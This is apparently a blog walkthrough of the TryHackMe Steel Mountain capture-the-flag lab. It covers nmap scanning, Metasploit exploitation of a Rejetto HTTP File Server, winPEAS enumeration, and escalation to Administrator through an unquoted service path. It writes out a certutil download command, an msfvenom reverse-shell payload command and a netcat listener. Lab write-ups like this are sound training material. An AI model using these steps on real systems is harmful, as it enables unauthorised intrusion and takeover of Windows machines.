Exploit a Rejetto HTTP File Server in Steel Mountain CTF from TryHackMe

Exploit a Rejetto HTTP File Server in Steel Mountain CTF from TryHackMe


3 min read

This walkthrough covers the Steel Mountain CTF found on TryHackMe. This room is designed to evaluate our Windows OS enumeration skills. We will utilize Metasploit to gain an initial foothold, followed by PowerShell to enumerate the machine and escalate our privileges to Administrator.

Step 1: Nmap

Note: ICMP is disabled, so we'll have to use the -Pn flag.

nmap -Pn -p- -vvv
80/tcp    open  http          syn-ack ttl 125
135/tcp   open  msrpc         syn-ack ttl 125
139/tcp   open  netbios-ssn   syn-ack ttl 125
445/tcp   open  microsoft-ds  syn-ack ttl 125
3389/tcp  open  ms-wbt-server syn-ack ttl 125
5985/tcp  open  wsman         syn-ack ttl 125
8080/tcp  open  http-proxy    syn-ack ttl 125
47001/tcp open  winrm         syn-ack ttl 125
49152/tcp open  unknown       syn-ack ttl 125
49153/tcp open  unknown       syn-ack ttl 125
49154/tcp open  unknown       syn-ack ttl 125
49155/tcp open  unknown       syn-ack ttl 125
49156/tcp open  unknown       syn-ack ttl 125
49169/tcp open  unknown       syn-ack ttl 125
49170/tcp open  unknown       syn-ack ttl 125

From this scan, we can tell that there are two web servers, one of which will be our attack vector to get an initial foothold. Visiting the site on port 80 reveals nothing more than a static page for an employee of the month. Looking at the source code helps us identify a name, Bill Harper.

Moving on over to port 8080 proves to be a little more useful. Right off the bat, we can tell this is a user panel to an HTTP File Server.

Looking at the source code helps us narrow it down to a Rejetto HTTP File Server. This is great news because this version is vulnerable to an RCE and Metasploit has a module for it called rejetto_hfs_exec.

Step 2: Metasploit

From here we want to search for the rejetto module and configure the options.

After properly configuring the module and typing exploit, we get a meterpreter session and pop a shell to grab our first flag located in C:\Users\bill\Desktop. Use type user.txt to view it from the command line.

Step 3: Privilege Escalation

To enumerate this machine, we will use winPEAS. You can download the latest version here.

Start a Python server:

python3 -m http.server 8000

Upload winPEAS to the victims C:\Users\bill\Desktop directory using certutil.exe.

certutil.exe -urlcache -f winPEASany_ofs.exe

Run it by typing winPEASany_ofs.exe .

An interesting service called AdvancedSystemCareService9 is missing quotes and has a space in between the application name, which means we can escape it and run a program called "Advanced.exe" with a reverse shell.

Let's fire up msfvenom and generate a payload.

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=1337 -f exe -o Advanced.exe

Startup a Python server and transfer the payload over using certutil.

Move it to "C:\Program Files (x86)\IObit\", and be sure to put the file path in quotes due to the space.

Now we want to stop the AdvancedSystemCareService9 service.

Start a netcat listener to catch the reverse shell.

nc -lvnp 1337

Start the AdvancedSystemCareService9 service back up.

Step 4: Root

Pwned! From here we can grab the last flag found in C:\Users\Administrator\Desktop.

I hope you enjoyed this walkthrough of the Steel Mountain CTF found on TryHackMe. Happy Hacking.

Did you find this article valuable?

Support Jake Garrison by becoming a sponsor. Any amount is appreciated!